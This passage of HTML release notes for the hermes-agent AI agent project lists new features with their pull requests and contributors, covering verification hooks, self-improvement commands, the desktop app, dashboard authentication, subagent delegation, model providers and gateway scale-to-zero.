<li><strong>Coding verification evidence ledger</strong> — profile-scoped record of canonical project checks detected by <code>agent.coding_context</code>; gateway exposes verification status (<a href="https://github.com/NousResearch/hermes-agent/pull/52285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52285/hovercard">#52285</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52286/hovercard">#52286</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong><code>pre_verify</code> hook + coding guidance config</strong>; verification stop loop + ad-hoc verification scripts (<a href="https://github.com/NousResearch/hermes-agent/pull/55413" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55413/hovercard">#55413</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52296" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52296/hovercard">#52296</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52297" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52297/hovercard">#52297</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>verify-on-stop defaults OFF</strong> with a one-time v32 migration; skips doc-only edits; surface-aware "auto" default restored; gated off for messaging surfaces (<a href="https://github.com/NousResearch/hermes-agent/pull/53552" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53552/hovercard">#53552</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54740" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54740/hovercard">#54740</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55449/hovercard">#55449</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52412" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52412/hovercard">#52412</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>)</li>
</ul>
<h2>🎓 Self-Improvement (Learn / Journey)</h2>
<ul>
<li><strong><code>/learn &lt;anything&gt;</code></strong> — distill a reusable skill from a directory, URL, or a workflow you just walked through; honors CONTRIBUTING.md skill standards and mixed requirements (<a href="https://github.com/NousResearch/hermes-agent/pull/51506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51506/hovercard">#51506</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52372" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52372/hovercard">#52372</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55956" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55956/hovercard">#55956</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>/journey</code></strong> — CLI + TUI learning timeline of accumulated memories and skills, with in-place edit/delete (<a href="https://github.com/NousResearch/hermes-agent/pull/55555" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55555/hovercard">#55555</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55859/hovercard">#55859</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>Cheaper background review</strong> — aux-model routing + context digest + adaptive cadence for the post-turn self-improvement fork (<a href="https://github.com/NousResearch/hermes-agent/pull/49252" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49252/hovercard">#49252</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>memory</code> graph</strong> in the desktop — playable radial timeline of memories + skills over time (<a href="https://github.com/NousResearch/hermes-agent/pull/55226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55226/hovercard">#55226</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>🖥️ Hermes Desktop App</h2>
<h3>Coding cockpit</h3>
<ul>
<li><strong>First-class Projects</strong> — per-profile sidebar, coding rail, review pane, agent project tools (<code>project → repo → lane</code>); remote-gateway-aware folder picker + git cockpit (status, review, worktrees) (<a href="https://github.com/NousResearch/hermes-agent/pull/49037" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49037/hovercard">#49037</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54385" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54385/hovercard">#54385</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>Multi-terminal panel</strong> with read-only agent terminals; persist &amp; restore terminal tabs + scrollback across relaunch (<a href="https://github.com/NousResearch/hermes-agent/pull/54517" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54517/hovercard">#54517</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54585" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54585/hovercard">#54585</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>PR-style file diffs in chat</strong>; in-app spot editor for the file preview pane; inline rich embeds, diagrams &amp; alerts in assistant markdown (<a href="https://github.com/NousResearch/hermes-agent/pull/50731" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50731/hovercard">#50731</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52772" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52772/hovercard">#52772</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52935" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52935/hovercard">#52935</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>UX &amp; surfaces</h3>
<ul>
<li>Conversation timeline rail for long threads; context-usage breakdown popover; read-only spectator transcript for subagent watch windows; pop the composer into a draggable floating window (<a href="https://github.com/NousResearch/hermes-agent/pull/51094" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51094/hovercard">#51094</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54907" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54907/hovercard">#54907</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55033/hovercard">#55033</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49488" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49488/hovercard">#49488</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>)</li>
<li>Read replies aloud (auto-TTS) composer toggle; remember window size/position/maximized across launches; redesigned clarify prompt; shared overlay Panel primitive for cron/profiles/agents (<a href="https://github.com/NousResearch/hermes-agent/pull/55154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55154/hovercard">#55154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52086" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52086/hovercard">#52086</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52993" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52993/hovercard">#52993</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54558" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54558/hovercard">#54558</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Backup import/create/download from the web UI; add context-usage popover; flag already-installed themes in install pickers; config-driven Electron launch flags + GPU policy (<a href="https://github.com/NousResearch/hermes-agent/pull/54611" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54611/hovercard">#54611</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55410" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55410/hovercard">#55410</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53991/hovercard">#53991</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>Pets</strong> — roaming pet (opt-in), calmer/realistic roam, Alt+wheel scaling never cropped, frame-perfect hatch flow + CPU-safe chroma, pop-out overlay + notifications (<a href="https://github.com/NousResearch/hermes-agent/pull/55114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55114/hovercard">#55114</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55400" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55400/hovercard">#55400</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52877" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52877/hovercard">#52877</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47959" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47959/hovercard">#47959</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52303" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52303/hovercard">#52303</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Refactor wave (composer / god-file de-entangle)</h3>
<ul>
<li>Decomposed the composer into isolated engine hooks; extracted branch/esc/url/placeholder/popout engines; split <code>thread.tsx</code>, <code>sidebar/index.tsx</code>, onboarding overlay, and <code>use-prompt-actions</code> god files into focused modules; shared WebSocket layer decoupling desktop from dashboard (<code>hermes serve</code>) (<a href="https://github.com/NousResearch/hermes-agent/pull/55500" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55500/hovercard">#55500</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55842/hovercard">#55842</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55451" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55451/hovercard">#55451</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55453" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55453/hovercard">#55453</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55807" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55807/hovercard">#55807</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55504/hovercard">#55504</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54568" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54568/hovercard">#54568</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>perf: bound tool-result rendering so big <code>/learn</code> runs don't freeze; fast session switching under load (<a href="https://github.com/NousResearch/hermes-agent/pull/52273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52273/hovercard">#52273</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52620" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52620/hovercard">#52620</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>📊 Web Dashboard</h2>
<ul>
<li>Auto-initiate portal SSO redirect on unauthenticated load; interactive auth setup on no-provider non-loopback bind; confidential-client (<code>client_secret</code>) support in self-hosted OIDC (<a href="https://github.com/NousResearch/hermes-agent/pull/54846" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54846/hovercard">#54846</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50551" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50551/hovercard">#50551</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55344" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55344/hovercard">#55344</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Catalogue all memory-provider API keys in <code>OPTIONAL_ENV_VARS</code>; list &amp; add arbitrary custom <code>.env</code> keys on the Keys page; expose cron job execution fields; backup import/create/download (<a href="https://github.com/NousResearch/hermes-agent/pull/54546" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54546/hovercard">#54546</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54552" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54552/hovercard">#54552</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53551" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53551/hovercard">#53551</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54611" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54611/hovercard">#54611</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Offload PTY spawn/close off the event loop; exclude non-interactive providers from interactive login surfaces (<a href="https://github.com/NousResearch/hermes-agent/pull/53227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53227/hovercard">#53227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53239" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53239/hovercard">#53239</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IAvecilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IAvecilla">@IAvecilla</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Delegation &amp; subagents</h3>
<ul>
<li><strong>Background fan-out</strong> — parallel subagents run in the background, one consolidated return when all finish; calm "will resume" affordance for background <code>delegate_task</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/49734" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49734/hovercard">#49734</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52756/hovercard">#52756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Track background subagents in the CLI + TUI status bar (<a href="https://github.com/NousResearch/hermes-agent/pull/51441" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51441/hovercard">#51441</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51485" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51485/hovercard">#51485</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Agent loop, tools &amp; coding context</h3>
<ul>
<li>One-shot LLM helper + <code>llm.oneshot</code> gateway RPC; expose coding-context project facts (<code>project.facts</code> RPC) (<a href="https://github.com/NousResearch/hermes-agent/pull/51261" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51261/hovercard">#51261</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51259/hovercard">#51259</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><code>web_extract</code> truncate-and-store instead of LLM summarization; concurrent @-reference expansion (<a href="https://github.com/NousResearch/hermes-agent/pull/54843" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54843/hovercard">#54843</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55207" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55207/hovercard">#55207</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Friendly human-phrased tool labels for built-in tools; <code>/reasoning full</code> (uncapped thinking); <code>/timestamps</code> + timestamps in <code>/history</code>; <code>/prompt</code> composes in <code>$EDITOR</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/55166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55166/hovercard">#55166</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50499" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50499/hovercard">#50499</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50506/hovercard">#50506</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50509/hovercard">#50509</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Per-reasoning-model stale-timeout floor in stream + non-stream detectors; escalate SIGTERM→SIGKILL on host-pid termination after grace (<a href="https://github.com/NousResearch/hermes-agent/pull/52845" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52845/hovercard">#52845</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50489" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50489/hovercard">#50489</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Multiple <code>HERMES_WRITE_SAFE_ROOT</code> dirs; opt-in HTTP/WS body capture to an isolated, share-excluded <code>gui_bodies.log</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/53292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53292/hovercard">#53292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49044" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49044/hovercard">#49044</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h3>Compression &amp; sessions</h3>
<ul>
<li>In-place compaction option (single session id); flip <code>in_place</code> default to True with a guard fix (<a href="https://github.com/NousResearch/hermes-agent/pull/49739" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49739/hovercard">#49739</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52658" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52658/hovercard">#52658</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Backup includes <code>projects.db</code> and kanban boards in the pre-update snapshot (<a href="https://github.com/NousResearch/hermes-agent/pull/52990" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52990/hovercard">#52990</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h3>Providers &amp; models</h3>
<ul>
<li><strong>Google Vertex AI</strong> first-class provider for Gemini over the OpenAI-compatible endpoint — auto-mints and refreshes short-lived OAuth2 tokens from a service-account JSON / ADC (no static key); salvages &amp; modernizes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248493655" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/8427" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8427/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/8427">#8427</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slawt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slawt">@slawt</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/56363" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56363/hovercard">#56363</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slawt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slawt">@slawt</a>)</li>
<li>Krea via managed Nous Subscription gateway; Z.AI endpoint picker (Global/China/Coding Plan); Ollama-cloud reasoning_effort wiring; remove google-gemini-cli + google-antigravity OAuth providers (<a href="https://github.com/NousResearch/hermes-agent/pull/52647" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52647/hovercard">#52647</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52364/hovercard">#52364</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51494/hovercard">#51494</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50492" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50492/hovercard">#50492</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Honor <code>NOUS_INFERENCE_BASE_URL</code> env override for Nous OAuth; keep Nous auth fresh for idle dashboard/gateway agents (<a href="https://github.com/NousResearch/hermes-agent/pull/52270" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52270/hovercard">#52270</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50567" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50567/hovercard">#50567</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🌐 Gateway, Fleet &amp; Relay</h2>
<h3>Scale-to-zero &amp; drain</h3>
<ul>
<li><strong>Scale-to-zero idle detection + dormant-quiesce (Phase 0)</strong>; hardened dormancy guards; fixed arm-gate counting disabled placeholder platforms (<a href="https://github.com/NousResearch/hermes-agent/pull/52243" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52243/hovercard">#52243</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52359" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52359/hovercard">#52359</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52831" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52831/hovercard">#52831</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
